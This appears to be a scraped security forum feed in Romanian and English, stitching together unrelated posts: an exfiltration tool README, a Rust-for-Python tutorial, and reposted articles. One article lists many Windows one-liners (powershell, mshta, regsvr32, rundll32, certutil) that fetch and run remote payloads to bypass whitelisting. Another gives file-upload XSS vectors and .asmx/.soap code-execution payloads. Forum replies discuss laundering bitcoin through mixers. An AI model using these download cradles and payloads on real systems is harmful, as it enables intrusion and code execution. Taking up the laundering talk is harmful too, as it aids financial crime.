Leaderboard

Oferta de la Shodan, upgrade lifetime cont premium pentru 5$, in loc de 49$, Include: -all add-ons (HTTPS, Telnet, up to 10000 search results) - 20 export credits - Shodan maps, images, command-line - free copy of Shodan book

SG1 _______ _,.--==###\_/=###=-.._ ..-' _.--\\_//---. `-.. ./' ,--'' \_/ `---. `\. ./ \ .,-' _,,......__ `-. / \. /`. ./\' _,.--'':_:'"`:'`-..._ /\. .'\ / .'`./ ,-':":._.:":._.:"+._.:`:. \.'`. `. ,' // .-''"`:_:'"`:_:'"`:_:'"`:_:'`. \ \ / ,' /'":._.:":._.:":._.:":._.:":._.`. `. \ / / ,'`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_\ \ \ ,\\ ; /_.:":._.:":._.:":._.:":._.:":._.:":\ ://, / \\ /'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'\ // \. |//_ \ ':._.:":._.+":._.:":._.:":._.:":._.:":._\ / _\\ \ /___../ /_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"'. \..__ | | | '":._.:":._.:":._.:":._.:":._.:":._.:":._.| | | | | |-:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`| | | | | |":._.:":._.:":._.:":._.:":._.+":._.:":._.| | | | : |_:'"`:_:'"`:_+'"`:_:'"`:_:'"`:_:'"`:_:'"`| ; | | \ \.:._.:":._.:":._.:":._.:":._.:":._.:":._| / | \ : \:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'.' ; | \ : \._.:":._.:":._.:":._.:":._.:":._.:":,' ; / `. \ \..--:'"`:_:'"`:_:'"`:_:'"`:_:'"`-../ / / `__.`.'' _..+'._.:":._.:":._.:":._.:":.`+._ `-,:__` .-'' _ -' .'| _________________________ |`.`-. `-.._ _____' _..-|| :.' .+/;;';`;`;;:`)+(':;;';',`\;\|. `,'|`-. `_____ MJP .-' .'.' :- ,'/,',','/ /./|\.\ \`,`,-,`.`. : `||-.`-._ .' ||.-' ,','/,' / / / + : + \ \ \ `,\ \ `.`-|| `. `-. .-' |' _','<', ,' / / // | \\ \ \ `, ,`.`. `. `. `-. : - `. `. BECAUSE REASONS SG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. In its core sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods. Have you ever thought to have your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe? WORK IN PROGRESS, DON'T JUDGE Installation Make sure you have at least go 1.8 in order to build sg1, then: go get github.com/miekg/dns go get github.com/evilsocket/sg1 cd $GOPATH/src/github.com/evilsocket/sg1/ make If you want to build for a different OS and / or architecture, you can instead do: GOOS=windows GOARCH=386 make After compilation, you will find the sg1 binary inside the build folder, you can start with taking a look at the help menu: ./build/sg1 -h Sursa: https://github.com/evilsocket/sg1

Bugurile respective au fost gasite in ethereum in Smart Contracts. Dupa cum am spus mai devreme: in BTC si ETH tu poti vedea tot ce se executa dar NU poti controla, bloca, modifica nimic! Este transparent dar imutabil. Bugurile alea permiteau (din neatentia programatorilor) sa faca lucruri care nu ar trebui sa fi fost executate. (de exemplu sa transfere in walletul lor bani din walletul altor persoane fara acordul lor). Dupa ce un hacker a abuzat bug-ul toate lumea vede greseala facuta si "cine" a furat banii. Dar din pricina imutabilitatii NIMENI nu poate reintoarce banii la proprietarul de drept. Tot ce se poate face e sa se rezolve bugul ca sa nu mai poata fi abuzat pe viitor. Deaia ai sa vezi stiri de genul "hacker stole 12456,58 $ and nobody can stop him anymore". (se stie exact cand, cat si cum) ON: http://www.techradar.com/how-to/how-to-use-a-bitcoin-tumbler tutorialul respectiv e foarte superficial. In anumite cazuri se pot monitoriza sumele si pana la un moment se pot face legaturi intre walletul original si cel temporar. In plus trebuie sa ai grija si de fiecare data cand cheltuiesti bani sa il re-speli. Exista scheme mai simple dovedite sa fie anonime.

Web Development Limbaje WEB: PHP, Javascript Design: Bootstrap Template engine: Smarty Editare/Fixare/Optimizare: Wordpress Framework pentru scrapere: Simple HTML Dom Informatii -Accept proiecte de lunga durata cat si cele de scurta durata. -La orice proiect or sa se stabileasca toate detaliile la inceput cu clientul, nu se pot aduce new features pe durata proiectului.(Decat mici modificari) -Support-ul este FREE in totalitate. Prin support ma refer: instalare, fixare buguri, fixare MySQL, etc. -Preturile or sa fie stabilite in functie de timpul necesar proiectului si complexitatea sa. -Accept si job-uri unde primesc salariu lunar. -Accept si job-uri in care sunt platit pe ora. Portofoliu: -Ofer live preview la proiecte in privat sau prin TeamViewer(Nu am voie sa las link-ul companiilor dar pot arata poze.) Plata -BitCoin/Etherum -PayPal -Transfer Bancar -Paysafe Contact -ICQ: MOMENTANT NEDISPONIBIL -Telegram: @adicode -Skype: adicode32@outlook.com -Jabber: adicode@404.city **Nu lasa-ti mesaje gen "ti-am dat add", "cat m-ar costa?", "poti face asta?" in topic, va rog frumos. Astept orice intrebare in PM sau pe una din retelele de mai sus. Multumesc.

What is Rust? Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring zero-cost abstractions move semantics guaranteed memory safety threads without data races trait-based generics pattern matching type inference minimal runtime efficient C bindings Description is taken from rust-lang.org. Why does it matter for a Python developer? The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There is a bunch of Rust packages out there to help you extending Python with Rust. I can mention Milksnake created by Armin Ronacher (the creator of Flask) and also PyO3 The Rust bindings for Python interpreter. See a complete reference list at the bottom of this article. Let’s see it in action For this post, I am going to use Rust Cpython, it’s the only one I have tested, it is compatible with stable version of Rust and found it straightforward to use. Pros: It is easy to write Rust functions and import from Python and as you will see by the benchmarks it worth in terms of performance. Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture, there will be a compiling stage which you don’t have when installing Pure Python libraries, you can make it easier using rust-setuptools or using the MilkSnake to embed binary data in Python Wheels. Python is sometimes slow Yes, Python is known for being “slow” in some cases and the good news is that this doesn’t really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance, often happens with string parsing and image processing. Example Let’s say you have a Python function which does a string processing, take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python. # How many subsequent-repeated group of chars are in the given string? abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here} 1 2 3 4 5 6 Python is slow for doing large string processing, so you can use pytest-benchmark to compare a Pure Python (with Iterator Zipping) function versus a Regexp implementation. # Using a Python3.6 environment $ pip3 install pytest pytest-benchmark Then write a new Python program called doubles.py import re import string import random # Python ZIP version def count_doubles(val): total = 0 # there is an improved version later on this post for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total # Python REGEXP version double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) # Benchmark it # generate 1M of random letters to test it val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) Run pytest to compare: $ pytest doubles.py ============================================================================= platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 2 items doubles.py .. ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_regex 24.6824 (1.0) 32.3960 (1.0) 27.0167 (1.0) test_pure_python 51.4964 (2.09) 62.5680 (1.93) 52.8334 (1.96) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Regexp – 27.0167 <– less is better Python Zip – 52.8334 Extending Python with Rust Create a new crate crate is how we call Rust Packages. Having rust installed (recommended way is Rust is https://www.rustup.rs/ )also available on Fedora and RHEL repositories by the rust-toolset I used rustc 1.21.0 In the same folder run: cargo new pyext-myrustlib It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation). Edit Cargo.toml It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python. [package] name = "pyext-myrustlib" version = "0.1.0" authors = ["Bruno Rocha <rochacbruno@gmail.com>"] [lib] name = "myrustlib" crate-type = ["dylib"] [dependencies.cpython] version = "0.1" features = ["extension-module"] Edit src/lib.rs What we need to do: Import all macros from cpython crate. Take Python and PyResult types from CPython into our lib scope. Write the count_doubles function implementation in Rust, note that this is very similar to the Pure Python version except for: It takes a Python as first argument, which is a reference to the Python Interpreter and allows Rust to use the Python GIL. Receives a &str typed val as reference. Returns a PyResult which is a type that allows the rise of Python exceptions. Returns an PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)) and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok on that type. (note that our PyResult expects a u64 as return value). Using py_module_initializer! macro we register new attributes to the lib, including the __doc__ and also we add the count_doubles attribute referencing our Rust implementation of the function. Attention to the names libmyrustlib, initlibmyrustlib, and PyInit. We also use the try! macro, which is the equivalent to Python’stry.. except. Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python. #[macro_use] extern crate cpython; use cpython::{Python, PyResult}; fn count_doubles(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; // There is an improved version later on this post for (c1, c2) in val.chars().zip(val.chars().skip(1)) { if c1 == c2 { total += 1; } } Ok(total) } py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | { try!(m.add(py, "__doc__", "This module is implemented in Rust")); try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str)))); Ok(()) }); Now let’s build it with cargo $ cargo build --release Finished release [optimized] target(s) in 0.0 secs $ ls -la target/release/libmyrustlib* target/release/libmyrustlib.d target/release/libmyrustlib.so* <-- Our dylib is here Now let’s copy the generated .so lib to the same folder where our doubles.py is located. NOTE: on Fedora you must get a .so in other system you may get a .dylib and you can rename it changing extension to .so. $ cd .. $ ls doubles.py pyext-myrustlib/ $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so $ ls doubles.py myrustlib.so pyext-myrustlib/ Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as it was a Python module. Importing from Python and comparing the results Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it. import re import string import random import myrustlib # <-- Import the Rust implemented module (myrustlib.so) def count_doubles(val): """Count repeated pair of chars ins a string""" total = 0 for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) def test_rust(benchmark): # <-- Benchmark the Rust version benchmark(myrustlib.count_doubles, val) Benchmark $ pytest doubles.py ============================================================================== platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 3 items doubles.py ... ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_rust 2.5555 (1.0) 2.9296 (1.0) 2.6085 (1.0) test_regex 25.6049 (10.02) 27.2190 (9.29) 25.8876 (9.92) test_pure_python 52.9428 (20.72) 56.3666 (19.24) 53.9732 (20.69) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Rust – 2.6085 <– less is better Regexp – 25.8876 Python Zip – 53.9732 Rust implementation can be 10x faster than Python Regex and 21x faster than Pure Python Version. Interesting that Regex version is only 2x faster than Pure Python 🙂 NOTE: That numbers makes sense only for this particular scenario, for other cases that comparison may be different. Updates and Improvements After this article has been published I got some comments on r/python and also on r/rust The contributions came as Pull Requests and you can send a new if you think the functions can be improved. Thanks to: Josh Stone we got a better implementation for Rust which iterates the string only once and also the Python equivalent. Thanks to: Purple Pixie we got a Python implementation using itertools, however this version is not performing any better and still needs improvements. Iterating only once fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; let mut chars = val.chars(); if let Some(mut c1) = chars.next() { for c2 in chars { if c1 == c2 { total += 1; } c1 = c2; } } Ok(total) } def count_doubles_once(val): total = 0 chars = iter(val) c1 = next(chars) for c2 in chars: if c1 == c2: total += 1 c1 = c2 return total Python with itertools import itertools def count_doubles_itertools(val): c1s, c2s = itertools.tee(val) next(c2s, None) total = 0 for c1, c2 in zip(c1s, c2s): if c1 == c2: total += 1 return total New Results ------------------------------------------------------------------------------- Name (time in ms) Min Max Mean ------------------------------------------------------------------------------- test_rust_once 1.0072 (1.0) 1.7659 (1.0) 1.1268 (1.0) test_rust 2.6228 (2.60) 4.5545 (2.58) 2.9367 (2.61) test_regex 26.0261 (25.84) 32.5899 (18.45) 27.2677 (24.20) test_pure_python_once 38.2015 (37.93) 43.9625 (24.90) 39.5838 (35.13) test_pure_python 52.4487 (52.07) 59.4220 (33.65) 54.8916 (48.71) test_itertools 58.5658 (58.15) 66.0683 (37.41) 60.8705 (54.02) ------------------------------------------------------------------------------- The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure python After adding the improvements to iterate the list of chars only once, Rust still has advantage from 1.1268 to 39.583 Conclusion Rust may not be yet the general purpose language of choice by its level of complexity and may not be the better choice yet to write common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of others crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth to keep an eye open to the future! References The code snippets for the examples showed here are available in GitHub repo: https://github.com/rochacbruno/rust-python-example. The examples in this publication are inspired by Extending Python with Rust talk by Samuel Cormier-Iijima in Pycon Canada. video here: Also by My Python is a little Rust-y by Dan Callahan in Pycon Montreal. video here: Other references: https://github.com/mitsuhiko/snaek https://github.com/PyO3/pyo3 https://pypi.python.org/pypi/setuptools-rust https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish http://jakegoulding.com/rust-ffi-omnibus/ https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs https://bheisler.github.io/post/calling-rust-in-python/ https://github.com/saethlin/rust-lather Join Community Join Rust community, you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you to join https://t.me/rustlangbr and there is the http://bit.ly/canalrustbr on Youtube. Author Bruno Rocha Senior Quality Engineer at Red Hat Teaching Python and Flask at CursoDePython.com.br Fellow Member of Python Software Foundation Member of RustBR study group M0ore info: http://about.me/rochacbruno and http://brunorocha.org Source

Daca ar durea prostia... te-ai zvarcoli pe jos.. @yoyois, ti-ai gasit si tu cu cine sa faci conversatie

UPDATE. 24.11.2017. Am adaugat si alte modalitatii de plata si adrese de contact.

Promotii online de black Friday / Thanksgiving Day: https://pastebin.com/EvJJqBJD (via: https://twitter.com/bbaskin/status/934074433664442369) Daca va uitat prin thread-ul de pe twiiter mai sunt cateva...

Syscall Monitor Introduction This is a process monitoring tool (like Sysinternal's Process Monitor) implemented with Intel VT-X/EPT for Windows 7+. Develop Environment Visual Studio 2015 update 3 Windows SDK 10 Windows Driver Kit 10 QT5.7 for MSVC Deployment QT GUI project: SyscallMonQT/SyscallMonQT.pro Windows kernel driver project: ddimon/DdiMon/DdiMon.vcxproj Remember to modify the shadow build path to /build32 or /build64 when configure the QT project Remember to modify the windeploy.exe path in deploy32/deploy64.bat, run deploy32/64.bat to deploy x86/x64 binary files to bin32/bin64 Remember to sign the x64 kernel driver file Platform x86 and x64 Windows 7, 8.1 and 10 CPU with Intel VT-x and EPT technology support Reference & Thanks BOOST http://www.boost.org/ QT https://www.qt.io/ HyperPlatform https://github.com/tandasat/HyperPlatform Capstone http://www.capstone-engine.org/ TODO 1.Optimize the memory usage issue. Screenshots Sursa: https://github.com/hzqst/Syscall-Monitor

Windows oneliners to download remote payload and execute arbitrary code 20 novembre 2017 arno0x0x In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ? These command lines need to fulfill the following prerequisites: allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ? allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ? be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ? make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ? work in memory only – because your final payload might get caught by AV when written on disk A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries. Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache. When it comes to downloading a payload from a remote server, it basically boils down to 3 options: either the command itself accepts an HTTP URL as one of its arguments the command accepts a UNC path (pointing to a WebDAV server) the command can execute a small inline script with a download cradle Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location: C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\ C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir> On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ». In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk. Powershell Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following: 1 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" Process performing network call: powershell.exe Payload written on disk: NO (at least nowhere I could find using procmon !) Of course you could also use its encoded counterpart. But you can also call the payload directly from a WebDAV server: 1 powershell -exec bypass -f \\webdavserver\folder\payload.ps1 Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Cmd Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts So once you’ve been creative with your payload as a batch file, go for it: 1 cmd.exe /k < \\webdavserver\folder\batchfile.txt Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Cscript/Wscript Also very common, but the idea here is to download the payload from a remote server in one command line: 1 cscript //E:jscript \\webdavserver\folder\payload.txt Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Mshta Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload: 1 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) Process performing network call: mshta.exe Payload written on disk: IE local cache You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file: 1 mshta http://webserver/payload.hta Process performing network call: mshta.exe Payload written on disk: IE local cache Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff: 1 mshta \\webdavserver\folder\payload.hta Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Rundll32 A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path: 1 rundll32 \\webdavserver\folder\payload.dll,entrypoint Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Rundll32 can also be used to call some inline jscript: 1 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); Process performing network call: rundll32.exe Payload written on disk: IE local cache Regasm/Regsvc Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV: 1 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Regsvr32 Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option: 1 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll Process performing network call: regsvr32.exe Payload written on disk: IE local cache Second option using UNC/WebDAV: 1 regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Odbcconf This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV: 1 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Msbuild Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option): 1 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe. Combining some commands After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective. For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this: 1 certutil -urlcache -split -f http://webserver/payload payload Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload: 1 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll You could simply deliver an executable: 1 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post ! One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware. Payloads source examples All the command lines previously cited make use of specific payloads: Various scriplets (.sct), for mshta, rundll32 or regsvr32 HTML Application (.hta) MSBuild inline tasks (.xml or .csproj) DLL for InstallUtil or Regasm/Regsvc You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco. You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT You can also find some other examples on my gist: https://gist.github.com/Arno0x Sursa: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

Why BlackList < WhiteList 22 Nov 2017 Often, when you write the code, which is responsible for file uploading, you check the extensions of downloaded file with using “whitelist” (when you can upload only files with certain extensions) or “blacklist” (when you can upload any files which are not included in the list). After the @ldionmarcil’s post, I decided to understand how popular web-servers interact with various types of extensions. Firstly, I was interested in which content-type is returned by the web-server on different file types. Developers usually include only well-known and obvious extensions in the blacklist. In the article, I want to consider not the wide-spreading file types. For demonstration PoC, I used the following payloads: Basic XSS payload: <script>alert(1337)</script> XML-based XSS payload: <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script> Below I’ll show the results of this little research. IIS web server By default, IIS responds with the text/html content-type on the file types, which presented in list below: Extensions with basic vector: .cer .hxt .htm Therefore, it is possible to paste the basic XSS vector in the uploaded file, and we will get an alert box in browser after opening the document. The list below includes extensions on which IIS responds with the content-type which allow to execute XSS via XML-based vector. Extensions with XML-based vector: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml By default, IIS also supports SSI, however exec section is prohibited for the security reasons Extensions for SSI: .stm .shtm .shtml More detailed information about SSI is written in the post by @ldionmarcil In addition: There are also two other interesting extensions (.asmx and .soap) that could lead to arbitrary code execution. It was discovered in collaboration with Yury Aleinov (@YuryAleinov). Asmx extension If you can upload file with .asmx extension, it can lead to arbitrary code execution. For example, we took file with the following content: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; using System.Diagnostics; [WebService(Namespace="")] public class MyClass : WebService { [WebMethod] public string Pwn_Function() { Process.Start("calc.exe"); return "PWNED"; } } Then we sent POST request to the uploaded document: POST /1.asmx HTTP/1.1 Host: localhost Content-Type: application/soap+xml; charset=utf-8 Content-Length: 287 <?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <Pwn_Function/> </soap12:Body> </soap12:Envelope> As the result, IIS executed “calc.exe” Soap extension Contents of uploaded file with .soap extension: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; public class MyClass : MarshalByRefObject { public MyClass() { System.Diagnostics.Process.Start("calc.exe"); } } SOAP request: POST /1.soap HTTP/1.1 Host: localhost Content-Length: 283 Content-Type: text/xml; charset=utf-8 SOAPAction: "/" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <MyFunction /> </soap:Body> </soap:Envelope> Apache (httpd or Tomcat) Extensions with basic vector: .shtml .html.de or .html.xxx (xxx – any characters)* Extensions with XML-based vector: .rdf .xht .xml .xsl .svg .xhtml .svgz * if there are any characters after “.html.” in the extension, Apache will respond with text/html content-type. In addition: Apache returns response without Content-type header on a large number of files with different extensions, which allows an XSS attack, because browser often decides how to handle this page by itself. This article includes detailed information about this question. For example, files with the .xbl and .xml extension are processed similar in Firefox (if there is no Content-Type header in the response), so there is the possibility of exploiting XSS using XML-based vector in this browser. Nginx Extensions with basic vector: .htm Extensions with XML-based vector: .svg .xml .svgz Sursa: https://mike-n1.github.io/ExtensionsOverview

@yoyois @adicode Daca totul e 100% legal sau, mai bine zis, totul e 100% transparent si public si toata lumea stie tot fiindca totul e la liber, atunci cum se explica stirile postate tot pe aici in care unii au gasit nu stiu ce bug in btc si apoi in eth de ordinul miliardelor de dolari parca (cred ca milarde era vorba). Pai nu se vede de la o posta si daca se face o tranzactie de 0.001$ (in btc sau eth) de la cine si unde se duce ? Pai atunci, un milion de dolari sau, si mai mult, un milard de dolari, nu e vizibil unde s-a dus ? Atunci cum e cu transparenta asta de 100% daca pe tine te poate despista pentru 10 dolari iar pe aia ca au dat un tun de un miliard (sau hai sa zicem si un milion) de dolari, alora nu le poate da nimeni de urma ? Brusc nu mai e transparenta ca nu inteleg cum au putut sa "evapore" ditamai banetu' ? P.S. Articolele sunt postate pe RST, nu le mai gasesc, dar la un search cred ca iti apar.

Ba sa stii ca am auzit destule. Chiar de mixere aveam intentia sa mentionez, dar si ele au multe probleme. Un mixer e "bun" doar daca e "privat" si are un volum de monede si utilizatori mare (sute de useri). In plus exista si niste metode prin care mixerele devin utile. Asa out of the box un mixer ofera 0 securitate. O idee de mixer bun sunt ICO. Sunt niste strategii multi-leveled pt spalat banii prin mixere. Dar ele nu "curata" banii ci doar ingreuneaza urmarilea lor. (muta dovezile de cauza spre corelatie) @QuoVadis bine punctat oricum. Mixerele utilizate corect sunt aproape de "anonimitatea" de care se vorbeste in topic. Daca combini mixerele cu zkSNARKS si niste contabilitate esti aproape de ce consider eu "spalare eficienta".

E putin off-topic, dar @yoyois vazand cu cat patos scrii, banuiesc ca inca nu ai auzit de bitcoin tumblere / mixere? Ca nu stii tu sa speli bitcoin-ul nu inseamna ca nu e posibil. Uite tema pentru vacanta de Craciun, putin research

Hai sa iti dau un exemplu: Iti creezi un wallet anonim online prin 3 VPNuri (wallet:xvc2) Cumperi 1BTC de la zebrapay automat in mall in Bucuresti. Ce iti cere automatul zebrapay? Adressa walletului xwc2. (Pana acum stim ca xwc2 e din Bucuresti si a fost la mall la ora 13:45, daca sunt si camere e perfect) Platesti 0.5 BTC ca sa-ti cumperi un VPS de pe care hostezi un botnet (vps inregistrat pe mailul tau) Platesti 0.2 BTC sa-ti cumperi un card SD de pe amazon trimis la adresa ta de acasa. Platesti 0.1 BTC sa iti cumperi un covrig de la noua covrigarie digitala din coltul blocului. (Ce stie covrigaria despre tine: ca ti-ai luat un vps de la o firma anume ca ti-ai luat un card cati bani ai in cont cati bani ai avut si cati ai cheiltuit unde si cum) TRANZACTIILE BTC SUNT PUBLICE!!! Daca superi pe tata FBI ce poate afla FBI despre tine: de unde ai incarcat cu BTC si cand (aka tara si orasul) emailul tau si ce VPS ai cu ce continut(de la provider) adresa ta de acasa(de la amazon) numele si cu ce esti imbracat(de la covrigarie) Tine in minte ca ABSOLUT TOT ce faci in btc este salvat si este legat de walletul tau pe vecie, public, accesibil oricui. E stupid de simplu sa vezi cine plateste pe cine cand si cum. Din asta poti sa intelegi ce fel de relatii au si ce fac. Daca vrei sa faci ceva ilegal, grav cu btc mai bine te potolesti. PS: Daca da careva o bere fac un post in care explic in detaliu cum cred eu ca se pot spala monede virtuale. Haida cu ilegalele pe 